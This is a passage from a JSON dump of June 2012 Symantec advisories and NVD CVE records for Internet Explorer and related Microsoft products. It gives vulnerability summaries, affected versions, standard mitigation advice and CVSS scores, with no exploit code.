7.0 \n * Microsoft Internet Explorer 8 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nThe vendor released an advisory along with fixes to address this issue. Please see the references for more information.\n", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2012-1879 'insertAdjacentText()' Method Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1879"], "modified": "2012-06-12T00:00:00", "id": "SMNTC-53868", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/53868", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:15", "description": "### Description\n\nMicrosoft Internet Explorer is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 SP1 \n * Microsoft Internet Explorer 6.0 SP2 \n * Microsoft Internet Explorer 6.0 SP3 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nWhen possible, run all software as a user with minimal privileges and limited access to system resources. Use additional precautions such as restrictive environments to insulate software that may potentially handle malicious content.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nVendor updates are available. Please see the references for details.\n", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2012-1872 EUC-JP Character Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1872"], "modified": "2012-06-12T00:00:00", "id": "SMNTC-53843", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/53843", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2021-06-08T19:04:08", "description": "### Description\n\nMicrosoft Internet Explorer and Microsoft Lync are prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Groove Server 2010 \n * Microsoft Groove Server 2010 SP1 \n * Microsoft InfoPath 2007 SP2 \n * Microsoft InfoPath 2007 SP3 \n * Microsoft InfoPath 2010 (32-bit editions) \n * Microsoft InfoPath 2010 (64-bit editions) \n * Microsoft InfoPath 2010 SP1 (32-bit editions) \n * Microsoft Internet Explorer 8 \n * Microsoft Internet Explorer 9 \n * Microsoft Lync 2010 \n * Microsoft Lync 2010 Attendant (32-bit) \n * Microsoft Lync 2010 Attendant (64-bit) \n * Microsoft Lync 2010 Attendee \n * Microsoft Office Communicator 2007 R2 \n * Microsoft Office SharePoint Server 2007 SP2 (64-bit) \n * Microsoft Office SharePoint Server 2007 SP2 \n * Microsoft Office SharePoint Server 2007 SP3 (64-bit) \n * Microsoft Office SharePoint Server 2007 SP3 \n * Microsoft Office Web Apps 2010 \n * Microsoft Office Web Apps 2010 SP1 \n * Microsoft SharePoint Foundation 2010 \n * Microsoft SharePoint Foundation 2010 SP1 \n * Microsoft SharePoint Server 2010 Enterprise Edition \n * Microsoft SharePoint Server 2010 SP1 \n * Microsoft SharePoint Server 2010 Standard Edition \n * Microsoft Windows SharePoint Services 3.0 SP2 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nWhen possible, run all software as a user with minimal privileges and limited access to system resources. Use additional precautions such as restrictive environments to insulate software that may potentially handle malicious content.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nVendor updates are available. Please see the references for details.\n", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer And Microsoft Lync HTML Sanitizing Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1858"], "modified": "2012-06-12T00:00:00", "id": "SMNTC-53842", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/53842", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T19:04:13", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 SP1 \n * Microsoft Internet Explorer 6.0 SP2 \n * Microsoft Internet Explorer 6.0 SP3 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nThe vendor released an advisory along with fixes to address this issue. Please see the references for more information.\n", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2012-1523 Center Element Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1523"], "modified": "2012-06-12T00:00:00", "id": "SMNTC-53841", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/53841", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:09", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 SP1 \n * Microsoft Internet Explorer 6.0 SP2 \n * Microsoft Internet Explorer 6.0 SP3 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nThe vendor released an advisory along with fixes to address this issue. Please see the references for more information.\n", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2012-1876 Col Element Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1876"], "modified": "2012-06-12T00:00:00", "id": "SMNTC-53848", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/53848", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:18", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 8 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nThe vendor released an advisory along with fixes to address this issue. Please see the references for more information.\n", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2012-1874 Developer Toolbar Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1874"], "modified": "2012-06-12T00:00:00", "id": "SMNTC-53845", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/53845", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2023-06-05T14:14:02", "description": "Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka \"Title Element Change Remote Code Execution Vulnerability.\"", "cvss3": {}, "published": "2012-06-12T22:55:00", "type": "cve", "title": "CVE-2012-1877", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1877"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:internet_explorer:6", "cpe:/a:microsoft:internet_explorer:7", "cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:9"], "id": "CVE-2012-1877", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1877", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:13:59", "description": "Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka \"insertRow Remote Code Execution Vulnerability.\"", "cvss3": {}, "published": "2012-06-12T22:55:00", "type": "cve", "title": "CVE-2012-1880", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1880"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:internet_explorer:6", "cpe:/a:microsoft:internet_explorer:7", "cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:9"], "id": "CVE-2012-1880", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1880", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:13:59", "description": "Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka \"OnBeforeDeactivate Event Remote Code Execution Vulnerability.\"", "cvss3": {}, "published": "2012-06-12T22:55:00", "type": "cve", "title": "CVE-2012-1878", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1878"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:internet_explorer:6", "cpe:/a:microsoft:internet_explorer:7", "cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:9"], "id": "CVE-2012-1878", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1878", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:13:58", "description": "Microsoft Internet Explorer 7 through 9 does not properly create and initialize string data, which allows remote attackers to obtain sensitive information from process memory via a crafted HTML document, aka \"Null Byte Information Disclosure Vulnerability.\"", "cvss3": {}, "published": "2012-06-12T22:55:00", "type": "cve", "title": "CVE-2012-1873", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1873"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:internet_explorer:7", "cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:9"], "id": "CVE-2012-1873", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1873", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:13:59", "description": "Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka \"Same ID Property Remote Code Execution Vulnerability.\"", "cvss3": {}, "published": "2012-06-12T22:55:00", "type": "cve", "title": "CVE-2012-1875", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1875"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:internet_explorer:8"], "id": "CVE-2012-1875", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1875", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:14:01", "description": "Microsoft Internet Explorer 8 and 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka \"OnRowsInserted Event Remote Code Execution Vulnerability.\"", "cvss3": {}, "published": "2012-06-12T22:55:00", "type": "cve", "title": "CVE-2012-1881", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1881"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:9"], "id": "CVE-2012-1881", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1881", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:14:00", "description": "Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by attempting to access an undefined memory location, aka \"insertAdjacentText Remote Code Execution Vulnerability.\"", "cvss3": {}, "published": "2012-06-12T22:55:00", "type": "cve", "title": "CVE-2012-1879", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1879"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:internet_explorer:6", "cpe:/a:microsoft:internet_explorer:7", "cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:9"], "id": "CVE-2012-1879", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1879", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:14:00", "description": "Microsoft Internet Explorer 6 through 9 does not block cross-domain scrolling events, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site, aka \"Scrolling Events Information Disclosure Vulnerability.\"", "cvss3": {}, "published": "2012-06-12T22:55:00", "type": "cve", "title": "CVE-2012-1882", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1882"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:internet_explorer:6", "cpe:/a:microsoft:internet_explorer:7", "cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:9"], "id": "CVE-2012-1882", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1882", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:13:58", "description": "Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to inject arbitrary web script or HTML via crafted character sequences with EUC-JP encoding, aka \"EUC-JP Character Encoding Vulnerability.\"", "cvss3": {}, "published": "2012-06-12T22:55:00", "type": "cve", "title": "CVE-2012-1872", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1872"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:internet_explorer:6", "cpe:/a:microsoft:internet_explorer:7", "cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:9"], "id": "CVE-2012-1872", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1872", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:13:56", "description": "The toStaticHTML API (aka the SafeHTML component) in Microsoft Internet Explorer 8 and 9, Communicator 2007 R2, and Lync 2010 and 2010 Attendee does not properly handle event attributes and script, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via a crafted HTML document, aka \"HTML Sanitization Vulnerability.\"", "cvss3": {}, "published": "2012-06-12T22:55:00", "type": "cve", "title": "CVE-2012-1858", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1858"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:lync:2010", "cpe:/a:microsoft:office_communicator:2007", "cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:9"], "id": "CVE-2012-1858", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1858", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:office_communicator:2007:r2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:lync:2010:*:x86:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:lync:2010:*:x64:*:*:*:*:*", "cpe:2.3:a:microsoft:lync:2010:*:attendee:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:12:56", "description": "Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka \"Center Element Remote Code Execution Vulnerability.\"", "cvss3": {}, "published": "2012-06-12T22:55:00", "type": "cve", "title": "CVE-2012-1523", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1523"], "modified": "2021-07-23T15:12:00", "cpe": ["cpe:/a:microsoft:internet_explorer:6", "cpe:/a:microsoft:internet_explorer:7", "cpe:/a:microsoft:internet_explorer:8"], "id": "CVE-2012-1523", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1523", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", 